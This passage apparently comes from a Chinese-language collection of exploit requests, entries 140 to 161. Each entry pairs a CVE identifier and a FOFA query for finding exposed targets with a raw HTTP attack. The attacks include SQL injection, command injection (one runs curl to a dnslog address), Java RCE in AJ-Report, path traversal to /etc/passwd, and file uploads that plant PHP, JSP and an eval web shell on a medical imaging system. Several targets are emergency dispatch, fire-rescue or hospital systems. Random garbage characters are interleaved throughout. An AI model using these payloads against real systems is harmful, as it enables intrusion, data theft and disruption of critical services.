3 U1 g1 N {# {# y+ ?9 ~GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.13 r' O! Z$ E! A' p% f) f
Host: x.x.x.x
6 l* {: T# k+ \1 B: G2 j$ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 _& u! O, a, w+ ]# h, }2 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 q4 w3 q5 B; U+ `0 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% o9 l6 U: r' F; Q
Accept-Encoding: gzip, deflate, br; ?, n" E, `" j S5 @' a* u, n4 U
Connection: close
- L; w3 `" v/ x. v7 s# qCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
2 v2 T! K! o8 J N$ I6 q5 wUpgrade-Insecure-Requests: 1' l, Q$ R0 ?1 I/ i) F* |$ I/ i
4 P+ |( ?$ w( `) o3 c- s
" K, O/ z' U" n; O" C& K! F& n/ c
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入7 S1 \0 h- o$ |' O9 S9 G2 [5 h! c2 U
CVE-2024-2566
- `! F' V* R& d1 r' B9 i8 dFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- A# p" \9 @# i) B0 z4 V8 V5 I3 NGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
% Y, a. n1 r [3 D$ R& W a7 ~Host: x.x.x.x% L3 N" S# A' b# d* O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! C7 O( c6 D9 ~# L' |4 P# @/ M+ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) y6 o4 V) j1 T3 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 p5 x3 Q6 ^' e* C7 {1 V
Accept-Encoding: gzip, deflate, br
" M, O+ ~3 ~/ K9 J1 tConnection: close
+ a: w; p1 T* Z2 g V. ~( X @+ R6 X& QCookie: authcode=h8g9: [3 a0 e& w$ G/ A
Upgrade-Insecure-Requests: 1
( R/ b8 a+ ]) I6 g0 }5 C+ X& g* A" L+ g% t
8 Y s( J- j7 d, x
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
9 T1 o: n* t( C- w! iFOFA:body="指挥调度管理平台"' I& Q4 x4 [; i( f
POST /app/ext/ajax_users.php HTTP/1.1
7 |0 q9 q7 G! a. G2 CHost: your-ip
0 k6 J v6 G5 v+ q) j) uUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
# w6 }+ i1 j0 {( c2 kContent-Type: application/x-www-form-urlencoded
* w( C* l7 k: J0 @% Y' y M. u8 |
& \8 `7 E1 D _7 g, x8 Udep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
- M0 k3 W4 y6 c+ U- {, m5 {- H
# n. j% e/ L$ ?0 }
142. CMSV6车辆监控平台系统中存在弱密码3 l8 K; Y) g% z9 C v+ P
CVE-2024-29666
) e7 \) C+ B2 u0 DFOFA:body="/808gps/"
f( l9 j$ P0 n1 \admin/admin+ U% `5 A& x4 a. B. C
143. Netis WF2780 v2.1.40144 远程命令执行
& `5 u6 S3 S; h% c- F5 bCVE-2024-25850" @# C& X$ ~0 ^
FOFA:title='AP setup' && header='netis'
$ V8 H; u+ }2 s6 t5 s& s, iPAYLOAD
' r! n4 K: T2 H* i
9 N0 {( Z, F. w6 C3 S144. D-Link nas_sharing.cgi 命令注入
' \0 a8 t# U$ q AFOFA:app="D_Link-DNS-ShareCenter"" Z+ f; E+ r. v: S, o5 o
system参数用于传要执行的命令
4 d( ^* o0 y* QGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
+ Y. V# ?; h0 d8 P# T; q1 E# ^Host: x.x.x.x1 g# ~" Y& c# @0 {" J
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.01 [4 v+ B& B: h* V8 v$ i6 d
Connection: close
2 j( o' Y- E3 _5 EAccept: */*
. X3 {6 f+ s4 o7 g0 hAccept-Language: en
1 |- n, y+ L" y iAccept-Encoding: gzip
5 e: J; _' Y! f2 y2 N. a. @( C( `
4 N: _& @" a3 N, r) R1 S% |6 O, I& k# ]. E1 }$ r) a8 u+ p& K
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入1 E9 n' p; J O$ q" y; `
CVE-2024-34008 C' O" N* R! w7 ]' `! t
FOFA:icon_hash="-631559155"6 _1 k# o2 H, o
GET /global-protect/login.esp HTTP/1.1
( a y! a' E) N% \6 D( hHost: 192.168.30.112:1005
( }8 w9 z. {" G" ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
4 k$ T& O* }4 y6 A7 P5 PConnection: close
) L4 {- L, A0 P4 |$ e$ mCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;+ W; r; b* }7 t
Accept-Encoding: gzip
5 E4 `6 C5 J d. Q+ ?
, a% g) m% f5 a9 y2 @, j: A' v% {. n& x: }9 c- Q
146. MajorDoMo thumb.php 未授权远程代码执行: [, V0 W7 G6 b
CNVD-2024-02175" @% I, R+ j3 ?! j
FOFA:app="MajordomoSL"4 T6 K. o$ I1 b5 t5 N
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1$ |# c4 l0 q! G) D
Host: x.x.x.x
5 H$ e* A$ }5 F! j4 m9 ~ m" F% s1 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
$ z7 T P+ G" C: [( |- XAccept-Charset: utf-8
4 |, d1 i% H- ]$ BAccept-Encoding: gzip, deflate5 G& z6 V- _* j% `' z$ K' T
Connection: close: D3 L7 Y5 C- C$ m3 b/ U* X
5 _/ u/ P2 y$ Q) H/ R; Y
. ~; |# [) r9 O( D7 w3 e147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
* L, J0 c; i5 j- O3 _ FCVE-2024-32399* ~/ C/ [+ t1 E" a# @
FOFA:body="RaidenMAILD"
9 k# ^. j4 l3 v EGET /webeditor/../../../windows/win.ini HTTP/1.1
& P+ H% y, v: }) FHost: 127.0.0.1:819 P; }% m# H0 O( P
Cache-Control: max-age=06 \; d1 ]) a; d
Connection: close
; g) _3 H9 z4 S3 L1 Z' T
- j8 Q* v) M, a8 h6 s7 A$ D7 {8 U4 t7 o/ s' j
148. CrushFTP 认证绕过模板注入& }: G: j0 Q0 r
CVE-2024-4040, k3 c$ \/ g/ [
FOFA:body="CrushFTP"& {* P, L6 t5 S7 i5 W9 L
PAYLOAD
6 P% U3 W* M G4 |0 f5 N5 F q4 S" E. L, f3 O6 J
149. AJ-Report开源数据大屏存在远程命令执行
" h' b; J* B; ` n: HFOFA:title="AJ-Report"
8 J: q U' B/ i3 G6 B& d
5 D9 C* O. L/ P) ?# h# I3 k E$ ?+ kPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1- |% i, S2 E8 i. w. d+ m$ z
Host: x.x.x.x1 j+ o3 c/ M- j# N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- F8 j' o3 b1 n! S! z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 E2 Y6 R- y0 b9 H- d
Accept-Encoding: gzip, deflate, br7 s; J7 h0 J/ q' v5 k# u
Accept-Language: zh-CN,zh;q=0.93 ~1 F% {( `. h; h6 f
Content-Type: application/json;charset=UTF-8. h# n0 Z7 Z$ V0 j6 U1 F( @# W z
Connection: close$ E/ y) }- W e. E( f
+ U& X8 @ R. [7 v
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}3 a/ V# r% G( C, f! W3 V* e
1 a1 r0 e7 Y) f2 ]% `; w- _150. AJ-Report 1.4.0 认证绕过与远程代码执行
" y: U3 d4 G5 ~8 D: dFOFA:title="AJ-Report"
* z* _$ f: f) w8 z, R; C' tPOST /dataSetParam/verification;swagger-ui/ HTTP/1.14 a9 i+ c! u. v
Host: x.x.x.x
8 [ n6 x" G4 V8 R+ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! I" Z7 R& P5 A& ^! i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 }; A$ U) d9 g* F2 N# I
Accept-Encoding: gzip, deflate, br) Z9 [0 `# x6 |1 m# C
Accept-Language: zh-CN,zh;q=0.99 m: ?/ z- L% k0 t- h# R( {
Content-Type: application/json;charset=UTF-85 y/ Z7 V* X J( ?; ^* H( b
Connection: close
9 T: T, D1 ]( q c# X$ jContent-Length: 339
# X2 c* s" W/ O0 v3 I& R0 ?, b6 I0 n' F" \/ L
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}1 [! G; u' a8 G
( o7 b* I! U- g0 @7 g& j5 J3 ?- X( U0 I6 Y, h3 b- k! @- ^
151. AJ-Report 1.4.1 pageList sql注入, ^7 @+ Z' s9 n1 _+ R
FOFA:title="AJ-Report"
5 J) Z& `% r$ |8 T/ q4 k' L# [' NGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
) Q6 M+ Q c9 k, P0 THost: x.x.x.x% A5 M5 q$ j9 Q |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: \' ^) D$ @1 v& A& c+ F& XConnection: close1 ]- r/ ~5 P. Q$ K7 l; I) x& U
Accept-Encoding: gzip
, d# z+ I+ v) V8 A) _4 X, c$ U$ q* ^
" M$ j* O: _0 |+ [152. Progress Kemp LoadMaster 远程命令执行8 u. K; w8 b, `3 J
CVE-2024-12128 F9 s3 ? C: m3 c/ D
LoadMaster <= 7.2.59.2 (GA)/ u. r3 I% K% @( o# X" Y
LoadMaster<=7.2.54.8 (LTSF)+ T- j8 l5 I: @; f3 U' c
LoadMaster <= 7.2.48.10 (LTS)
9 Y$ R: l) X! E$ c3 i0 ?& l7 JFOFA:body="LoadMaster"
( L$ s! o5 i8 v8 S/ YJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
- J% _% N4 l5 H: jGET /access/set?param=enableapi&value=1 HTTP/1.1) e& r/ a( s3 W0 V1 `0 r7 d& ~
Host: x.x.x.x
) W0 k$ B1 o2 m) V% S- H) RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' O5 B/ V. Z3 j8 `& y, t6 t$ J
Connection: close
- P- c& m" W& b, ]* Y1 NAccept: */*8 ^ }5 O7 c: [6 c6 c _
Accept-Language: en- s/ L" S3 }6 U* ]
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
7 W' Z6 M- M( E6 O2 K' v; AAccept-Encoding: gzip
5 U$ T2 H# \5 l6 T; y# \1 o5 f) B" M( _* I8 A4 k/ P* x1 b
0 [3 U* x6 V# p3 d1 q( ~
153. gradio任意文件读取
& R) c# B( @( o% [CVE-2024-1561FOFA:body="__gradio_mode__"' A( D, o4 M7 m( c+ J3 B
第一步,请求/config文件获取componets的id
. N0 T6 L5 f! \# ?+ R+ n$ ehttp://x.x.x.x/config
- F" y6 l8 a1 M2 o1 d G" b/ f6 a% j! ?6 j: q7 G
- I( c9 B+ ~3 s8 q4 C6 ?9 H% }第二步,将/etc/passwd的内容写入到一个临时文件, U9 }& A- t: c/ k# G. Q
POST /component_server HTTP/1.1
- ?9 K0 m, k7 f0 j) R2 r0 X3 u! ?: }Host: x.x.x.x
9 N4 {& w' e/ h Y9 n5 w0 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
9 z/ {) P8 h; Q0 o5 eConnection: close
2 K& P7 h) b5 _* w4 v6 T7 M1 BContent-Length: 115
n: N5 I5 F- gContent-Type: application/json8 W) a! }; l/ ^5 O- a. E
Accept-Encoding: gzip
) c# x5 A5 _/ K( f
8 {8 d; ^$ H L{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}5 ]; ^ @1 y, L( G. h/ b( c% r$ O5 u
9 I% g' Y/ Y' J# l
* v; K1 R- P6 O' G% c$ a第三步访问3 { M! E2 t) B/ K
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
. j! J) a0 Y# o: e* h" g& y( M9 |( C# i, J
5 X0 P* ^2 Q A% J1 p# E4 Q. x/ f154. 天维尔消防救援作战调度平台 SQL注入
. T# m6 T- G& _' l) Q+ tCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"6 t, p6 l2 H( g' m! F9 L3 H
POST /twms-service-mfs/mfsNotice/page HTTP/1.1: [5 Q( v/ J" l* I% U- F2 l
Host: x.x.x.x: K: g9 X8 V1 j6 Q: A1 y9 Y* |4 ]
Content-Length: 106
& b- u# E7 E4 @3 O* xCache-Control: max-age=0' U+ I, n% Z$ t, E
Upgrade-Insecure-Requests: 1
1 M/ ?( ?, S x3 [Origin: http://x.x.x.x
- k" r! ~( q& O/ Y# ZContent-Type: application/json
. x6 p8 v$ u: \! c0 r/ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36% F1 i/ g/ y6 ]) V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. r) |' b; J# r. {: R+ uReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
3 S5 o7 O8 d+ I' K. K' }Accept-Encoding: gzip, deflate1 f3 s1 K# t* J6 }+ H ^; {- d
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
/ q1 J8 n' c2 SConnection: close9 @2 Z8 C/ d+ y# E6 @1 M
0 P9 v4 I- k% F7 Z{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
1 y1 q' l4 F6 \4 D/ g A9 }5 k2 _8 c2 t1 a6 d
5 @8 s7 ], z4 i" ?155. 六零导航页 file.php 任意文件上传
- P `. Q4 ]+ L! w( `' ACVE-2024-34982
2 t2 q- N" }( J$ w9 a _FOFA:title=="上网导航 - LyLme Spage"0 Y- F+ ?' Q' Y0 s1 ~0 C% T
POST /include/file.php HTTP/1.1; N0 T2 A# x# I& s) F& t
Host: x.x.x.x
4 a/ u* d7 [3 v8 t; tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
5 z& s% q8 L3 t/ s0 l: s* J: j: yConnection: close0 p/ T. y+ q+ ^. E5 l
Content-Length: 232
1 ~4 l6 L' C1 }: X: X" [+ Z& hAccept: application/json, text/javascript, */*; q=0.012 L" N$ {1 \: k; J4 p
Accept-Encoding: gzip, deflate, br
5 S0 C( X8 n% m) o/ Z4 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ ~9 U4 ^4 j5 s1 P9 X( N3 ~+ L
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f. i5 Q0 H6 r O( L
X-Requested-With: XMLHttpRequest+ p* ~# I8 ?; \! \
, I- u5 `* T' p7 k0 `3 A' X-----------------------------qttl7vemrsold314zg0f0 b% Z! y: R. N8 _6 W
Content-Disposition: form-data; name="file"; filename="test.php"
' i5 {/ |+ r' R0 Y- aContent-Type: image/png( r8 C* q3 o- j
u( E2 M- Q/ w- ?" G7 M5 Q- {; Y" _<?php phpinfo();unlink(__FILE__);?>
8 g9 z5 i, M0 x* z/ c-----------------------------qttl7vemrsold314zg0f--5 W2 K$ L# y+ X4 w% Y
) ]( i3 b% U5 r/ l* ]
7 }% M1 p" }9 T, J: `访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php( r! C7 L b* W* T2 c3 r
( O& O" o, \% X/ r5 p: _' l4 B
156. TBK DVR-4104/DVR-4216 操作系统命令注入
6 V, c7 b; F( A; R* e: \3 J( U8 YCVE-2024-3721+ w, v; }- m% _! W8 V; ]% X
FOFA:"Location: /login.rsp"
~8 @2 u& K# V7 {·TBK DVR-4104* {2 X( P9 G' ?/ C" D% j; I
·TBK DVR-4216
( G0 T6 a: ^ z% ]curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"- e, K* ]+ B- s/ J
3 G4 C9 d4 S, b
& C1 z9 }* U( \. TPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
2 m* A7 J: X% a* p" OHost: x.x.x.x/ i. U9 H% I3 V0 K# r
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ p6 J3 L0 h( |. V# C8 wConnection: close, q h ]' f: { v
Content-Length: 0
& d) ]) K3 M$ ?8 Y. GCookie: uid=1
: U& c6 O( M! a! aAccept-Encoding: gzip
8 \! n; h* Z9 A1 a" p3 z$ U/ E+ B' w
2 G# k8 B7 Q! o) X; C157. 美特CRM upload.jsp 任意文件上传. I( W U( D! U2 L9 Q
CNVD-2023-069717 S4 k- s7 P- V, I8 |
FOFA:body="/common/scripts/basic.js"0 P3 z) ^; m8 D
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
- q4 w; A" O3 V7 a5 A, iHost: x.x.x.x
5 k3 c. F- M3 [ r" L3 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: x6 n) f9 c* z( \6 y# r3 i0 \
Content-Length: 709& c% l6 {5 F. {# n! F0 @" V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ s" Z- o8 _6 }
Accept-Encoding: gzip, deflate* }6 z6 a$ a9 A/ a% c5 z
Accept-Language: zh-CN,zh;q=0.9
+ b2 i9 s0 D; P% cCache-Control: max-age=0
* R% ]0 Y. ], j4 D! {' CConnection: close; `1 M- h* S ~4 }1 `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN4 ^. M5 ?! B# ~5 y$ i6 x
Upgrade-Insecure-Requests: 1
5 ?9 ~* p# h! K3 n# U6 x& X0 ~6 ~) P
------WebKitFormBoundary1imovELzPsfzp5dN
, t/ x/ ?5 K1 A1 @7 K5 ~ X* cContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"4 O3 q$ u6 t# N' i- ^7 s
Content-Type: application/octet-stream5 o5 b9 y* D5 k3 A& I
( }; J; D% Y" Y! J
nyhelxrutzwhrsvsrafb
/ U7 ?% o5 J7 T* q; c& @4 f7 z+ y------WebKitFormBoundary1imovELzPsfzp5dN; c) S& s* T& D
Content-Disposition: form-data; name="key"
6 j- M& Q2 n7 g D5 j
3 P8 S& V8 m v3 }0 S5 Onull' V+ k% x g" R# k/ _
------WebKitFormBoundary1imovELzPsfzp5dN: [' {9 k3 d' l: q7 h/ R
Content-Disposition: form-data; name="form"
3 z U9 ^" O) @: u5 |" i, H9 P0 G1 O8 y( v
null
% F% U+ N& y' ]4 ?2 P6 r, q/ I$ B------WebKitFormBoundary1imovELzPsfzp5dN, L% h% a/ K2 ~) T* K
Content-Disposition: form-data; name="field"" |6 ~4 p, g9 l: x$ Y, \7 e9 \& w
7 _! M& n4 ^! |null
& ^! ?: b/ {6 y: s/ s# d1 r------WebKitFormBoundary1imovELzPsfzp5dN
1 X* o" ?& k+ _8 B9 M, wContent-Disposition: form-data; name="filetitile"4 h4 L: I) d, q, [# w4 R
+ a, ^6 Q3 p% _* B- C0 {2 |! W8 Lnull
- C: l3 O2 g7 j$ n: U------WebKitFormBoundary1imovELzPsfzp5dN
4 r+ \0 [2 |$ c- SContent-Disposition: form-data; name="filefolder"' M$ U* x- F$ e3 Z$ G3 I5 x0 O$ v
) [; Y* Q2 o$ Q# }. Z- C
null
* |4 O/ y( h4 A; D------WebKitFormBoundary1imovELzPsfzp5dN--2 K, l& h0 l2 v7 @; q+ g
9 b0 ~1 C2 Q( d
7 n$ N. j1 x/ L
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp9 }# F" ]8 F, Z A* \6 D* J% v
- W! h8 m7 D9 D5 i* i4 D158. Mura-CMS-processAsyncObject存在SQL注入0 ^5 S. G5 E# d# V/ _! O& k
CVE-2024-32640
1 ~: ^ F! R# t+ ^8 C1 EFOFA:"Generator: Masa CMS"1 q2 g( s4 {8 o( ~* d% Q
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.13 @' `! Z" u1 y( u+ R' G
Host: {{Hostname}}
5 J4 e& q$ K! u0 o; }Content-Type: application/x-www-form-urlencoded P2 B1 |. W! u, G! e! B5 R
2 f, _0 E1 Q0 v- ]- E4 g8 V% Xobject=displayregion&contenthistid=x\'&previewid=1
- n1 C; L7 K3 D i, F6 ~
9 R3 p6 P+ k8 z: l3 G# W/ o4 ]* i. |% I: c1 q% k4 d! {
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传: b% C( }0 W( _2 S4 x# U; O) @
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")- L7 [! t3 j! i
POST /webservices/WebJobUpload.asmx HTTP/1.1
5 l% X, C2 `8 r: q3 C9 _0 p9 @Host: x.x.x.x
; Q/ q3 t# @* R% G! }. D: O: p. @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
o6 m! |6 q7 G$ d- o+ i& ~* GContent-Length: 1080
( p2 D5 z9 m. P! E+ TAccept-Encoding: gzip, deflate
& h+ x' G6 g# }1 u( u- Z# ?; aConnection: close
9 ~% F/ a1 |- \4 @Content-Type: text/xml; charset=utf-8' |3 r5 R' M* f9 x( K
Soapaction: "http://rainier/jobUpload"6 l" E6 P! C: S) P. @
]3 p5 a( v9 r! H ?4 Z, W
<?xml version="1.0" encoding="utf-8"?>7 s/ o4 \ r9 O' f% B% _7 `9 z
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">, q- v& b) B* I3 u! M
<soap:Body>
0 D5 k' U2 \! `<jobUpload xmlns="http://rainier">2 A& }+ H& G& |+ _ g0 E
<vcode>1</vcode>
4 O* {/ q7 ~4 v( z8 W$ n<subFolder></subFolder>, O0 z) e; \ O8 ^. [- Q: p
<fileName>abcrce.asmx</fileName>
" L U) i4 S* l<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
: i# W& p) ]- v/ g, P1 T$ Q4 `</jobUpload>
$ p$ i- j) ~/ H2 S$ z</soap:Body>4 c& o! ^5 _+ N& b+ L
</soap:Envelope>0 w! e0 E" X( N# c
* B7 T" `/ j% s2 B( _- O4 ]- \$ e- F$ K* _5 \6 x) A
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
* C8 p: p" L. F1 o! K6 d! O* Y( ]' O9 c. O
$ ^- d& V w, f, h+ ?5 {6 p
160. Sonatype Nexus Repository 3目录遍历与文件读取
# A2 B a7 T8 E- q* o' k+ gCVE-2024-4956
3 |) C. O6 {8 u* C" B/ r1 }4 m; J9 U1 @FOFA:title="Nexus Repository Manager"
. D5 ]1 R- B& d8 DGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1# [) \& e3 S+ s" v* G9 ~
Host: x.x.x.x
/ Z% }9 k! N7 ~! d+ M9 W1 `+ CUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0# P. u6 A) i/ `+ t
Connection: close
2 U& A1 _& d( f9 _+ {1 A$ SAccept: */*
% x5 c* u$ y l% ~, f5 jAccept-Language: en, C* D$ x$ Q. @
Accept-Encoding: gzip$ K" g3 W$ q2 e, f7 P6 W
2 Q, }$ C; J& X8 H/ Z6 x
! ?& a& }( Z+ R! W" _; @161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传6 H% Z7 m0 \( ]" |' Z
FOFA:body="/KT_Css/qd_defaul.css"! v R, {2 m& x/ t4 `
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密: C1 \' q7 {$ f w% t: H( S; c0 ^& d5 v
POST /Webservice.asmx HTTP/1.1
6 j. u9 S+ }3 p: }4 S: w+ y+ D: tHost: x.x.x.x+ s- t, _8 ]6 w# O) }0 p; Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.363 h3 M2 I6 H9 z! P5 g
Connection: close
: n& c4 C" a0 W/ N& RContent-Length: 4450 z6 D/ W3 h1 A4 s0 s+ p; ]6 K: R
Content-Type: text/xml! N) q; ?" z0 {9 L- b* E+ {
Accept-Encoding: gzip4 a, I J5 k% |2 G T
# N) ~- L6 t/ z0 s4 {; V<?xml version="1.0" encoding="utf-8"?>
' n c, K- n) d: w8 I<soap:Envelope xmlns:xsi="
5 Y; d0 x2 V7 z8 I, Bhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"* A0 s; G. |. J$ S/ ]8 Q4 r
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 e: B; B6 X6 ]! V; w5 F
<soap:Body>: o9 m' `# [9 m9 N
<UploadResume xmlns="http://tempuri.org/">, I! K. N; B4 Y: R9 x6 g, x
<ip>1</ip>8 ~1 Q- ^5 u6 U
<fileName>../../../../dizxdell.aspx</fileName>
